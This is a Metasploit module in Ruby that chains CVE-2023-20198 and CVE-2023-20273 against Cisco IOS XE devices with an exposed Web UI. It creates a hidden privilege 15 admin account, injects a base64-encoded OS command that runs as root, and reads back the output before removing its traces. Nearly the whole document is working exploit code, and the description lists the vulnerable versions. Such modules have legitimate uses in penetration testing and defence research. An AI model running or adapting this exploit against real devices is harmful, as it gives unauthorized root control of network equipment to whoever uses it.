Cisco IOX XE Unauthenticated OS Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HTTP::CiscoIosXe  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Retry  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Cisco IOX XE unauthenticated OS command execution',  
'Description' => %q{  
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE  
devices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges.  
  
This module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user,  
CVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read  
back via the webserver. Finally the output file is deleted and the admin user is removed.  
  
The vulnerable IOS XE versions are:  
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,  
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,  
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,  
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,  
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,  
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,  
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,  
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,  
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,  
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,  
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,  
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,  
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,  
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,  
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,  
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,  
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,  
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,  
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,  
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,  
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,  
17.11.99SW  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'sfewer-r7', # MSF module  
],  
'References' => [  
['CVE', '2023-20198'],  
['CVE', '2023-20273'],  
# Vendor advisories.  
['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],  
['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],  
# Vendor list of (205) vulnerable versions.  
['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],  
# Technical details on CVE-2023-20198.  
['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],  
['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],  
# Technical details on CVE-2023-20273.  
['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/']  
],  
'DisclosureDate' => '2023-10-16',  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
OptString.new('CMD', [ true, 'The OS command to execute.', 'id']),  
OptString.new('CISCO_ADMIN_USERNAME', [false, 'The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.']),  
OptString.new('CISCO_ADMIN_PASSWORD', [false, 'The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.']),  
OptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30])  
]  
)  
end  
  
def run  
# If the user has supplied a username/password, we can use these creds to leverage CVE-2023-20273 and execute an OS  
# command. If a username/password have not been supplied, we can leverage CVE-2023-20198 to create a new admin  
# account, and then leverage CVE-2023-20273 to execute an OS command. This opens up the ability to leverage the  
# auxiliary module for CVE-2023-20198 to create a new admin account once, then use those new admin creds in this  
# module to execute multiple OS command without the need to create a new 'temporary' admin account for every  
# invocation of this module (which will reduce the noise in the devices logs).  
if !datastore['CISCO_ADMIN_USERNAME'].blank? && !datastore['CISCO_ADMIN_PASSWORD'].blank?  
exececute_os_command(datastore['CISCO_ADMIN_USERNAME'], datastore['CISCO_ADMIN_PASSWORD'])  
else  
admin_username = Rex::Text.rand_text_alpha(8)  
admin_password = Rex::Text.rand_text_alpha(8)  
  
unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)  
print_error('Failed to create admin user')  
return  
end  
  
begin  
vprint_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")  
  
exececute_os_command(admin_username, admin_password)  
ensure  
vprint_status("Removing user '#{admin_username}'")  
  
unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)  
print_warning('Failed to remove user')  
end  
end  
end  
end  
  
def exececute_os_command(admin_username, admin_password)  
out_file = Rex::Text.rand_text_alpha(8)  
  
cmd = "$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}"  
  
unless run_os_command(cmd, admin_username, admin_password)  
print_error('Failed to run command')  
return  
end  
  
begin  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri('webui', out_file),  
'headers' => {  
'Authorization' => basic_auth(admin_username, admin_password)  
}  
)  
  
unless res&.code == 200  
print_error('Failed to get command output')  
return  
end  
  
print_line(res.body)  
ensure  
vprint_status("Removing output file '/var/www/#{out_file}'")  
  
# Deleting the output file can take more than one attempt.  
success = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do  
if run_os_command("rm /var/www/#{out_file}", admin_username, admin_password)  
next true  
end  
  
vprint_status('Failed to delete output file, waiting and trying again...')  
false  
end  
  
unless success  
print_error("Failed to delete output file '/var/www/#{out_file}")  
print_error(out_file)  
end  
end  
end  
end  
`